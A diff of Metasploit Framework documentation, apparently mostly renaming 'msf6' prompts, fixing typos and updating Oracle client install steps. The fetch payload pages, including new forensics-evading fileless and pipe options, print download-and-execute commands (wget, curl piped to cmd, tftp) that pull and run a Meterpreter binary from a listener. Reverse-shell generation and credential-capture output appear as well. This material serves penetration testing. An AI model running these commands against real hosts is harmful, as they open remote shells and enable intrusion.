+| [metasploit-4.17.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.17.1-2020080301-linux-x64-installer.run.asc)   |


 ## Metasploit Framework Source
@@ -6,7 +6,7 @@ Mentors: [@zerosteiner](https://github.com/zerosteiner), [@jmartin-r7](https://g

 ### Retain active status of authentication tokens

-Many testing techniques interacting with web servers such as `XSS` rely on ensuring authentication obtained on a target be kept active. A mechanism for registering and maintaining open authentications identified during a test for the duration of the console session may provide an additional utility to enable more modules to target techniques that need valid authentication to be maintained. One such authentication token would be data retained in a cookie for a web service. This project would lay the groundwork for registering gathered or generated authenticaion tokens against a target to be refreshed and sustained until a console exits, or in some cases across console restarts.
+Many testing techniques interacting with web servers such as `XSS` rely on ensuring authentication obtained on a target be kept active. A mechanism for registering and maintaining open authentications identified during a test for the duration of the console session may provide an additional utility to enable more modules to target techniques that need valid authentication to be maintained. One such authentication token would be data retained in a cookie for a web service. This project would lay the groundwork for registering gathered or generated authentication tokens against a target to be refreshed and sustained until a console exits, or in some cases across console restarts.

 Difficulty: 2/5

@@ -112,6 +112,11 @@ end
    * **Reliability** - The Reliability field describes how reliable the session is that gets returned by the exploit, ex: `REPEATABLE_SESSION`, `UNRELIABLE_SESSION`
    * **SideEffects** - The SideEffects field describes the side effects cause by the exploit that the user should be aware of, ex: `ARTIFACTS_ON_DISK`, `IOC_IN_LOGS`, `ACCOUNT_LOCKOUTS`.

+### Non-required fields
+
+* **Stance** - The types of stances an exploit can take, such as passive or aggressive. Stances indicate whether or not the module triggers the exploit without waiting for one or more conditions to be met (aggressive) or whether it must wait for certain conditions to be satisfied before the exploit can be initiated (passive). Passive exploits usually would wait for interaction from a client or other entity for being able to trigger the vulnerability.
+
+* **Passive** - Either `true` or `false` indicates whether or not the exploit should be run as a background job. If for example you know the vulnerability takes an hour to trigger, setting `Passive` to `true` would be beneficial as it allows the user to continue using msfconsole while waiting for a response from the exploit.

 Your exploit should also have a `check` method to support the check command, but this is optional in case it's not possible.

@@ -290,7 +290,7 @@ end
 msfconsole output:

 ```msf
-msf6 exploit(windows/smb/msf_smb_client_test) > options
+msf exploit(windows/smb/msf_smb_client_test) > options

 Module options (exploit/windows/smb/msf_smb_client_test):

@@ -319,7 +319,7 @@ Exploit target:
   0   Windows


-msf6 exploit(windows/smb/msf_smb_client_test) > run
+msf exploit(windows/smb/msf_smb_client_test) > run

 [*] Started reverse SSL handler on 172.16.60.1:4444
 [*] 172.16.60.128:445 - Create and write to Windows\Temp\payload.bat on \\172.16.60.128\C$ remote share
@@ -407,7 +407,7 @@ end
 msfconsole output:

 ```msf
-msf6 exploit(windows/smb/ruby_smb_client_test) > options
+msf exploit(windows/smb/ruby_smb_client_test) > options

 Module options (exploit/windows/smb/ruby_smb_client_test):

@@ -436,7 +436,7 @@ Exploit target:
   0   Windows


-msf6 exploit(windows/smb/ruby_smb_client_test) > run
+msf exploit(windows/smb/ruby_smb_client_test) > run

 [*] Started reverse SSL handler on 172.16.60.1:4444
 [*] 172.16.60.128:445 - Create and write to Windows\Temp\payload.bat on \\172.16.60.128\C$ remote share
@@ -18,7 +18,7 @@ puts identify_hash "_9G..8147mpcfKT8g0U."
 ```
 In practice, we receive the following output from this:
 ```ruby
-msf5 > irb
+msf > irb
 [*] Starting IRB shell...
 [*] You are in the "framework" object

@@ -201,7 +201,7 @@ This data breaks down to the following table:
 | MSCash2                              | mscash2-hashcat    | `$DCC2$10240#tom#e4e938d12fe5974dc42a90120bd9c90f`                                                                                                                                                                                                                     | hashcat      | mscash2              |                                                  | auxiliary/analyze/crack_windows                           |
 | MSSQL (2005)                         | mssql05_toto       | `0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908`                                                                                                                                                                                                               | toto         | mssql05              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
 | MSSQL                                | mssql_foo          | `0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254`                                                                                                                                                                       | foo          | mssql                | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
-| MSSQL (2012)                         | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16`                                                                                                                       | Password!    | mssql12              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
+| MSSQL (2012)                         | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16`                                                                                                                       | Password1!    | mssql12              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
 | MySQL                                | mysql_probe        | `445ff82636a7ba59`                                                                                                                                                                                                                                                     | probe        | mysql                | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
 | MySQL SHA1                           | mysql-sha1_tere    | `*5AD8F88516BD021DD43F171E2C785C69F8E54ADB`                                                                                                                                                                                                                            | tere         | mysql-sha1           | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
 | Oracle                               | simon              | `4F8BC1809CB2AF77`                                                                                                                                                                                                                                                     | A            | des,oracle           | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
@@ -4,7 +4,7 @@ They are designed to have a very loose definition in order to make them as usefu
 Plugins are not available by default, they need to be loaded:

 ```msf
-msf6 > load plugin_name
+msf > load plugin_name
 ```

 Plugins can be automatically loaded and configured on msfconsole's start up by configuring a custom `~/.msf4/msfconsole.rc` file:
@@ -61,9 +61,9 @@ The current available plugins for Metasploit can be found by running the `load -
 The Alias plugin adds the ability to alias console commands:

 ```msf
-msf6 > load alias
+msf > load alias
 [*] Successfully loaded plugin: alias
-msf6 > alias -h
+msf > alias -h
 Usage: alias [options] [name [value]]

 OPTIONS:
@@ -76,20 +76,20 @@ OPTIONS:
 Register an alias such as `proxy_enable`:

 ```msf
-msf6 > alias proxy_enable "set Proxies http:localhost:8079"
+msf > alias proxy_enable "set Proxies http:localhost:8079"
 ```

 Now when running the aliased `proxy_enable` command, the proxy datastore value will be set for the current module:

 ```msf
-msf6 auxiliary(scanner/http/title) > proxy_enable
+msf auxiliary(scanner/http/title) > proxy_enable
 Proxies => http:localhost:8079
 ```

 Viewing registered aliases:

 ```msf
-msf6 > alias
+msf > alias

 Current Aliases
 ===============
@@ -122,9 +122,9 @@ To use the plugin, it must first be loaded. That will provide the `captureg` com
 and stop subcommands. In the following example, the plugin is loaded, and then all default services are started on the 192.168.159.128 interface.

 ```msf
-msf6 > load capture
+msf > load capture
 [*] Successfully loaded plugin: Credential Capture
-msf6 > captureg start --ip 192.168.159.128
+msf > captureg start --ip 192.168.159.128
 Logging results to /home/smcintyre/.msf4/logs/captures/capture_local_20220325104416_589275.txt
 Hash results stored in /home/smcintyre/.msf4/loot/captures/capture_local_20220325104416_612808
 [+] Authentication Capture: DRDA (DB2, Informix, Derby) started
@@ -150,7 +150,7 @@ Hash results stored in /home/smcintyre/.msf4/loot/captures/capture_local_2022032
 [+] LLMNR Spoofer started
 [+] mDNS Spoofer started
 [+] Started capture jobs
-msf6 >
+msf >
 ```

 This content was originally posted on the [Rapid7 Blog](https://www.rapid7.com/blog/post/2022/03/25/metasploit-weekly-wrap-up-154/).
@@ -18,8 +18,8 @@ Metasploit's DNS configuration is controlled by the `dns` command which has mult

 The current configuration can be printed by running `dns print`:

-```msf6
-msf6 > dns print
+```msf
+msf > dns print
 Default search domain: N/A
 Default search list:   lab.lan
 Current cache size:    0
@@ -12,7 +12,7 @@ msf auxiliary(oracle_login) > run
 ```
 or
 ```msf
-msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
+msf auxiliary(scanner/oracle/oracle_hashdump) > run

 [-] Failed to load the OCI library: cannot load such file -- oci8
 [-] Try 'gem install ruby-oci8'
@@ -23,34 +23,27 @@ msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
 The general steps to getting Oracle support working are to install the Oracle Instant Client and development libraries, install the required dependencies for Kali Linux, then install the gem.

 ## Install the Oracle Instant Client
-As root, create the directory `/opt/oracle`. Then download the [Oracle Instant Client](http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html) packages for your version of Kali Linux. The packages you will need are:
+As root, create the directory `/opt/oracle`. Then download the [Oracle Instant Client](https://www.oracle.com/database/technologies/instant-client/downloads.html) packages for your version of Kali Linux. The packages you will need are:

-* instantclient-basic-linux-12.2.0.1.0.zip
-* instantclient-sqlplus-linux-12.2.0.1.0.zip
-* instantclient-sdk-linux-12.2.0.1.0.zip
+* [instantclient-basic-linux.x64-23.6.0.24.10.zip](https://download.oracle.com/otn_software/linux/instantclient/2360000/instantclient-basic-linux.x64-23.6.0.24.10.zip)
+* [instantclient-sqlplus-linux.x64-23.6.0.24.10.zip](https://download.oracle.com/otn_software/linux/instantclient/2360000/instantclient-sqlplus-linux.x64-23.6.0.24.10.zip)
+* [instantclient-sdk-linux.x64-23.6.0.24.10.zip](https://download.oracle.com/otn_software/linux/instantclient/2360000/instantclient-sdk-linux.x64-23.6.0.24.10.zip)

-Unzip these under `/opt/oracle`, and you should now have a path called `/opt/oracle/instantclient_12_2/`. Next symlink the shared library that we need to access the library from oracle:
-
-```
-root@kali:/opt/oracle/instantclient_12_2# ln libclntsh.so.12.1 libclntsh.so
-
-root@kali:/opt/oracle/instantclient_12_2# ls -lh libclntsh.so
-lrwxrwxrwx 1 root root 17 Jun  1 15:41 libclntsh.so -> libclntsh.so.12.1
-```
+Unzip these under `/opt/oracle`, and you should now have a path called `/opt/oracle/instantclient_23_6/`.

 You also need to configure the appropriate environment variables, perhaps by inserting them into your .bashrc file, logging out and back in for them to apply.

 ```
-export PATH=$PATH:/opt/oracle/instantclient_12_2
-export SQLPATH=/opt/oracle/instantclient_12_2
-export TNS_ADMIN=/opt/oracle/instantclient_12_2
-export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_2
-export ORACLE_HOME=/opt/oracle/instantclient_12_2
+export PATH=$PATH:/opt/oracle/instantclient_23_6
+export SQLPATH=/opt/oracle/instantclient_23_6
+export TNS_ADMIN=/opt/oracle/instantclient_23_6
+export LD_LIBRARY_PATH=/opt/oracle/instantclient_23_6
+export ORACLE_HOME=/opt/oracle/instantclient_23_6
 ```

 If you have succeeded, you should be able to run `sqlplus` from a command prompt:
 ```
-root@kali:/opt/oracle/instantclient_12_2# sqlplus
+root@kali:/opt/oracle/instantclient_23_6# sqlplus

 SQL*Plus: Release 12.2.0.1.0 Production on Tue Mar 26 20:40:24 2019

@@ -64,40 +57,40 @@ Enter user-name:
 First, download and extract the gem source release:

 ```
-root@kali:~# wget https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.2.7.zip
--2019-03-26 20:31:11--  https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.2.7.zip
+root@kali:~# wget https://github.com/kubo/ruby-oci8/archive/refs/tags/ruby-oci8-2.2.14.zip
+--2019-03-26 20:31:11--  https://github.com/kubo/ruby-oci8/archive/refs/tags/ruby-oci8-2.2.14.zip
 Resolving github.com (github.com)... 192.30.253.113, 192.30.253.112
 Connecting to github.com (github.com)|192.30.253.113|:443... connected.
 HTTP request sent, awaiting response... 302 Found
-Location: https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.7 [following]
--2019-03-26 20:31:11--  https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.7
+Location: https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.14 [following]
+--2019-03-26 20:31:11--  https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.14
 Resolving codeload.github.com (codeload.github.com)... 192.30.253.120, 192.30.253.121
 Connecting to codeload.github.com (codeload.github.com)|192.30.253.120|:443... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: unspecified [application/zip]
-Saving to: 'ruby-oci8-2.2.7.zip'
+Saving to: 'ruby-oci8-2.2.14.zip'

-ruby-oci8-2.2.7.zip                     [ <=>                                                                ] 376.97K  2.36MB/s    in 0.2s    
+ruby-oci8-2.2.14.zip                     [ <=>                                                                ] 376.97K  2.36MB/s    in 0.2s    

-2019-03-26 20:31:11 (2.36 MB/s) - 'ruby-oci8-2.2.7.zip' saved [386016]
+2019-03-26 20:31:11 (2.36 MB/s) - 'ruby-oci8-2.2.14.zip' saved [386016]

-root@kali:~# unzip ruby-oci8-2.2.7.zip 
-Archive:  ruby-oci8-2.2.7.zip
+root@kali:~# unzip ruby-oci8-2.2.14.zip 
+Archive:  ruby-oci8-2.2.14.zip
 0c85bf6da2f541de3236267b1a1b18f0136a8f5a
-   creating: ruby-oci8-ruby-oci8-2.2.7/
-  inflating: ruby-oci8-ruby-oci8-2.2.7/.gitignore  
-  inflating: ruby-oci8-ruby-oci8-2.2.7/.travis.yml 
+   creating: ruby-oci8-ruby-oci8-2.2.14/
+  inflating: ruby-oci8-ruby-oci8-2.2.14/.gitignore  
+  inflating: ruby-oci8-ruby-oci8-2.2.14/.travis.yml 
 [...]
-  inflating: ruby-oci8-ruby-oci8-2.2.7/test/test_rowid.rb
-root@kali:~# cd ruby-oci8-ruby-oci8-2.2.7/
+  inflating: ruby-oci8-ruby-oci8-2.2.14/test/test_rowid.rb
+root@kali:~# cd ruby-oci8-ruby-oci8-2.2.14/
 ```

 Install libgmp (needed to build the gem) and set the path to prefer the correct version of ruby so that Metasploit can use it.

 ```
-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# export PATH=/opt/metasploit/ruby/bin:$PATH
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# export PATH=/opt/metasploit/ruby/bin:$PATH

-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# apt-get install libgmp-dev
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# apt-get install libgmp-dev
 Reading package lists... Done
 Building dependency tree
 Reading state information... Done
@@ -117,7 +110,7 @@ Setting up libgmp-dev:amd64 (2:5.0.5+dfsg-2) ...
 Build and install the gem

 ```
-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# make
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# make
 ruby -w setup.rb config
 setup.rb:280: warning: assigned but unused variable - vname
 setup.rb:280: warning: assigned but unused variable - desc
@@ -130,12 +123,12 @@ setup.rb:280: warning: assigned but unused variable - default2
 <--- lib
 ---> ext
 ---> ext/oci8
-/opt/metasploit/ruby/bin/ruby /root/ruby-oci8-ruby-oci8-2.2.7/ext/oci8/extconf.rb
+/opt/metasploit/ruby/bin/ruby /root/ruby-oci8-ruby-oci8-2.2.14/ext/oci8/extconf.rb
 checking for load library path...
  LD_LIBRARY_PATH...
    checking /opt/metasploit/ruby/lib... no
-    checking /opt/oracle/instantclient_12_2... yes
-  /opt/oracle/instantclient_12_2/libclntsh.so.12.1 looks like an instant client.
+    checking /opt/oracle/instantclient_23_6... yes
+  /opt/oracle/instantclient_23_6/libclntsh.so.12.1 looks like an instant client.
 checking for cc... ok
 checking for gcc... yes
 checking for LP64... yes
@@ -144,11 +137,11 @@ checking for ruby header... ok
 checking for OCIInitialize() in oci.h... yes
 [...]
 linking shared-object oci8lib_250.so
-make[1]: Leaving directory `/root/ruby-oci8-ruby-oci8-2.2.7/ext/oci8'
+make[1]: Leaving directory `/root/ruby-oci8-ruby-oci8-2.2.14/ext/oci8'
 <--- ext/oci8
 <--- ext

-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# make install
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# make install
 ruby -w setup.rb install
 setup.rb:280: warning: assigned but unused variable - vname
 setup.rb:280: warning: assigned but unused variable - desc
@@ -158,5 +151,5 @@ mkdir -p /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/
 install oci8.rb /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/
 [...]
 <--- ext
-root@kali:~/ruby-oci8-ruby-oci8-2.2.7#
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14#
 ```
@@ -52,7 +52,7 @@ Which returns the following response:

 ### Start the server

-Use the following command to run the server with a configured uesrname and password:
+Use the following command to run the server with a configured username and password:

 ```
 $ ruby msfrpcd -U user -P pass -f
@@ -76,27 +76,27 @@ $ dig +short 4.tcp.ngrok.io

 metasploit side:
 ```msf
-msf6 > use payload/windows/x64/meterpreter/reverse_http
-msf6 payload(windows/x64/meterpreter/reverse_http) > set LHOST 192.0.2.1
+msf > use payload/windows/x64/meterpreter/reverse_http
+msf payload(windows/x64/meterpreter/reverse_http) > set LHOST 192.0.2.1
 LHOST => 192.0.2.1
-msf6 payload(windows/x64/meterpreter/reverse_http) > set LPORT 17511
+msf payload(windows/x64/meterpreter/reverse_http) > set LPORT 17511
 LPORT => 17511
-msf6 payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindAddress 127.0.0.1
+msf payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindAddress 127.0.0.1
 ReverseListenerBindAddress => 127.0.0.1
-msf6 payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindPort 4444
+msf payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindPort 4444
 ReverseListenerBindPort => 4444
-msf6 payload(windows/x64/meterpreter/reverse_http) > to_handler 
+msf payload(windows/x64/meterpreter/reverse_http) > to_handler 
 [*] Payload Handler Started as Job 2
-msf6 payload(windows/x64/meterpreter/reverse_http) > 
+msf payload(windows/x64/meterpreter/reverse_http) > 
 [*] Started HTTP reverse handler on http://127.0.0.1:4444

-msf6 payload(windows/x64/meterpreter/reverse_http) > generate -f exe -o ngrok_payload.exe
+msf payload(windows/x64/meterpreter/reverse_http) > generate -f exe -o ngrok_payload.exe
 [*] Writing 7168 bytes to ngrok_payload.exe...
-msf6 payload(windows/x64/meterpreter/reverse_http) > 
+msf payload(windows/x64/meterpreter/reverse_http) > 
 [*] http://127.0.0.1:4444 handling request from 127.0.0.1; (UUID: ghzekibo) Staging x64 payload (202844 bytes) ...
 [*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:55468) at 2024-09-10 16:43:58 -0400

-msf6 payload(windows/x64/meterpreter/reverse_http) > sessions -i -1
+msf payload(windows/x64/meterpreter/reverse_http) > sessions -i -1
 [*] Starting interaction with 1...

 meterpreter > getuid
@@ -86,8 +86,7 @@ OptSomething.new(option_name, [boolean, description, value, *enums*], aliases: *
  options](#Filtering-datastore-options) section for more information.
 * **fallbacks** *optional*, *key-word only* An array of names that will be used as a fallback if the main option name is
  defined by the user. This is useful in the scenario of wanting specialised option names such as `SMBUser`, but to also
-  support gracefully checking a list of more generic fallbacks option names such as `Username`. This functionality is 
-  currently behind a feature flag, set with `features set datastore_fallbacks true` in msfconsole
+  support gracefully checking a list of more generic fallbacks option names such as `Username`.

 Now let's talk about what classes are available:

@@ -24,7 +24,7 @@ cURL, or Certutil.

 ## Organization
 Unlike Command Stagers which are organized by binary, Fetch Payloads are organized by server. Currently, we support
-HTTP, HTTPS, and TFTP servers.  Once you select a fetch payload, you can select the binary you'd like to run on the
+HTTP, HTTPS, SMB, and TFTP servers.  Once you select a fetch payload, you can select the binary you'd like to run on the
 remote host to download the served payload prior to execution.

 Here is the naming convention for fetch payloads:
@@ -43,8 +43,8 @@ The fastest way to understand Fetch Payloads is to use them and examine the outp
 target with the ability to connect back to us with  an HTTP connection and a command execution vulnerability.
 First, let's look at the payload in isolation:
 ```msf
-msf6 exploit(multi/ssh/sshexec) > use payload/cmd/linux/http/x64/meterpreter/reverse_tcp
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > show options
+msf exploit(multi/ssh/sshexec) > use payload/cmd/linux/http/x64/meterpreter/reverse_tcp
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > show options

 Module options (payload/cmd/linux/http/x64/meterpreter/reverse_tcp):

@@ -62,22 +62,43 @@ LPORT               4444             yes       The listen port

 View the full module info with the info, or info -d command.

-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
 ```

 ### Options
 `FETCH_COMMAND` is the binary we wish to run on the remote host to download the adapted payload.  Currently, the
 supported options are `CURL FTP TFTP TNFTP WGET` on Linux hosts and `CURL TFTP CERTUTIL` on Windows hosts.  We'll get
 into more details on the binaries later.
-`FETCH_FILENAME` is the name you'd like the executable payload saved as on the remote host.  This option is not
-supported by every binary and must end in `.exe` on Windows hosts.  The default value is random.
+
 `FETCH_SRVHOST` is the IP where the server will listen.
+
 `FETCH_SRVPORT` is the port where the server will listen.
+
 `FETCH_URIPATH` is the URI corresponding to the payload file.  The default value is deterministic based on the
 underlying payload so a payload created in msfvenom will match a listener started in Framework assuming the underlying
 served payload is the same.
+
+### Dependent Options
+`FETCH_FILELESS` is an option that specifies a method to modify the fetch command to download the binary payload to
+memory rather than disk before execution, thus avoiding some HIDS and making forensics harder.  Currently, there are
+two options: `bash` and `python3.8+`.  Both of these require the target to be running Linux Kernel 3.17 or above.
+This option is only available when the platform is Linux.
+
+`FETCH_FILENAME` is the name you'd like the executable payload saved as on the remote host.  This option is not
+supported by every binary and must end in `.exe` on Windows hosts.  The default value is random.
+This option is only available when `FETCH_FILELESS` is set to `none`
+
+`FETCH_PIPE` is a binary flag that will create a second resource containing the original fetch command to run and then
+will produce a much shorter command to run on the host that will download the original fetch command and pipe it
+directly to the target's shell.  Use this option if there is a limit on the command size as it will result in a much
+smaller original command.  When set to true, the `FETCH_URIPATH` option is used for the pipe command resource uri and
+the default `FETCH_URIPATH`value is used for the original binary payload uri.
+This option is only available when the fetch  transport is HTTP or HTTPS and the payload platform is Linux with the 
+`FETCH_COMMAND` set to `CURL` or `WGET` or the platform is Windows and the `FETCH_COMMAND` is `CURL`
+
 `FETCH_WRITABLE_DIR` is the directory on the remote host where we'd like to store the served payload prior to execution.
-This value is not supported by all binaries.  If you set this value and it is not supported, it will generate an error.
+This value is not supported by all fetch binaries.  If you set this value and it is not supported, it will generate an error.
+This option is only available when `FETCH_FILELESS` is set to `none`

 The remaining options will be the options available to you in the served payload; in this case our served payload is
 `linux/x64/meterpreter/reverse_tcp` so our only added options are `LHOST` and `LPORT`.  If we had selected a different
@@ -85,19 +106,19 @@ payload, we would see different options.

 ### Generating the Fetch Payload
 ```msf
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_COMMAND WGET
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_COMMAND WGET
 FETCH_COMMAND => WGET
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVHOST 10.5.135.201
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVHOST 10.5.135.201
 FETCH_SRVHOST => 10.5.135.201
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVPORT 8000
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVPORT 8000
 FETCH_SRVPORT => 8000
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set LHOST 10.5.135.201
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set LHOST 10.5.135.201
 LHOST => 10.5.135.201
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set LPORT 4567
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set LPORT 4567
 LPORT => 4567
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw
 wget -qO ./YXeSdwsoEfOH http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YXeSdwsoEfOH; ./YXeSdwsoEfOH &
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
 ```

 You can see the fetch payload generated:
@@ -109,7 +130,7 @@ When you start the `Fetch Handler`, it starts both the server hosting the binary
 served payload.  With `verbose` set to `true`, you can see both the Fetch Handler and the Served Payload Handler are
 started:
 ```msf
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > to_handler
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > to_handler
 [*] wget -qO ./YBybOrAmkV http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YBybOrAmkV; ./YBybOrAmkV &
 [*] Payload Handler Started as Job 0
 [*] Fetch Handler listening on 10.5.135.201:8000
@@ -121,7 +142,7 @@ msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > to_handler
 The Fetch Handler is tracked with the Served Payload Handler, so you will only see the Served Payload Handler under
 `Jobs`, even though the Fetch Handler is listening:
 ```msf
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -l
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -l

 Jobs
 ====
@@ -130,7 +151,7 @@ Jobs
  --  ----                    -------                                     ------------
  0   Exploit: multi/handler  cmd/linux/http/x64/meterpreter/reverse_tcp  tcp://10.5.135.201:4567

-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000
 [*] exec: netstat -ant | grep 8000

 tcp        0      0 10.5.135.201:8000       0.0.0.0:*               LISTEN     
@@ -138,13 +159,13 @@ tcp        0      0 10.5.135.201:8000       0.0.0.0:*               LISTEN
 ```
 Killing the Served Payload handler will kill the Fetch Handler as well:
 ```msf
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -k 0
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -k 0
 [*] Stopping the following job(s): 0
 [*] Stopping job 0
-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000
 [*] exec: netstat -ant | grep 8000

-msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
+msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
 ```

 ## Using Fetch Payloads on the Fly
@@ -154,6 +175,20 @@ really odd situation where you can execute commands, you can get a session in fr
 a payload manually.  Just follow the steps above, and run the provided command.  Right now, the only thing we serve are
 Framework payloads, but in the future, expanding to serve and execute any executable binary would be relatively trivial.

+## Fetch Pipe
+If space is at a premium, you can use the `FETCH_PIPE` option.  When using `FETCH_PIPE`, the fetch server hosts two
+resources: the original binary and then the generated fetch command.  In the place of the original command, the command
+generated will be a much smaller command to download the original command and pipe it into the shell.
+The following example shows both the original command to download and execute the binary and the command to pipe the
+original fetch command directly to the shell.  Since this requires two downloads, it is less stealthy, but the
+command to run on the target is significantly shorter.
+``` msf
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > to_handler
+[*] Command served: curl -so %TEMP%\DpRdBIfeyax.exe http://10.5.135.117:8080/zw3LGTh9FtaLJ4bCQRAWdw & start /B %TEMP%\DpRdBIfeyax.exe
+
+[*] Command to run on remote host: curl -s http://10.5.135.117:8080/test|cmd
+```
+
 ## Using it in an exploit
 Using Fetch Payloads is no different than using any other command payload.  First, give users access to the Fetch
 payloads for a given platform by adding a target that supports `ARCH_CMD` and the desired platform, either `windows` or
@@ -255,7 +290,7 @@ Then, you can set `FetchListenerBindPort` to 3069 and get the callback correctly
 4) Because tftp is a udp-based protocol and because od the implementation of the server within Framework, each time you
 start a tftp fetch handler, a new service will start:
 ```msf
-msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobs
+msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobs

 Jobs
 ====
@@ -264,16 +299,16 @@ Jobs
  --  ----                    -------                                       ------------
  2   Exploit: multi/handler  cmd/windows/tftp/x64/meterpreter/reverse_tcp  tcp://10.5.135.201:4444

-msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 4445
+msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 4445
 LPORT => 4445
-msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler
+msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler

 [*] Command to run on remote host: curl -so plEYxIdBQna.exe tftp://10.5.135.201:8080/test1 & start /B plEYxIdBQna.exe
 [*] Payload Handler Started as Job 4

 [*] starting tftpserver on 10.5.135.201:8080
 [*] Started reverse TCP handler on 10.5.135.201:4445 
-msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobs
+msf payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobs

 Jobs
 ====
@@ -283,23 +318,23 @@ Jobs
  2   Exploit: multi/handler  cmd/windows/tftp/x64/meterpreter/reverse_tcp  tcp://10.5.135.201:4444
  4   Exploit: multi/handler  cmd/windows/tftp/x64/meterpreter/reverse_tcp  tcp://10.5.135.201:4445

-msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080
